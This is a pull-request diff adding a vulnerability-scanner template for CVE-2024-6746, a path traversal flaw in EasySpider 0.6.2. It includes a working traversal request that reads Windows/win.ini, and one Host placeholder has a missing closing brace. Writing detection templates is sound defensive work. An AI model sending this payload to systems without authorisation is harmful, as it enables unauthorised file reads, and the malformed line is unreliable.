Merge pull request #10302 from Kazgangap/easyspider

add CVE-2024-6746

network/cves/2024/CVE-2024-6746.yaml

@@ -0,0 +1,54 @@
+id: CVE-2024-6746
+
+info:
+  name: EasySpider 0.6.2 - Arbitrary File Read
+  author: securityforeveryone
+  severity: medium
+  description: |
+    A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \EasySpider\resources\app\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.
+  reference:
+    - https://github.com/NaiboWang/EasySpider/issues/466
+    - https://cvefeed.io/vuln/detail/CVE-2024-6746
+    - https://vuldb.com/?id.271477
+    - https://vuldb.com/?submit.371998
+    - https://vuldb.com/?ctiid.271477
+    - https://github.com/NaiboWang/EasySpider
+  classification:
+    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2024-6746
+    cwe-id: CWE-24
+    epss-score: 0.00045
+    epss-percentile: 0.1594
+  metadata:
+    vendor: naibowang
+    product: easyspider
+  tags: cve,cve2024,lfi,network
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /taskGrid/tasklist.html HTTP/1.1
+        Host: {{Hostname}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body,"Task List","Task ID","Task Name","URL","<title>任务列表 | Task List</title>")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /../../../../../../../../../Windows/win.ini HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body,"bit app support","fonts","extensions")'
+          - 'status_code == 200'
+        condition: and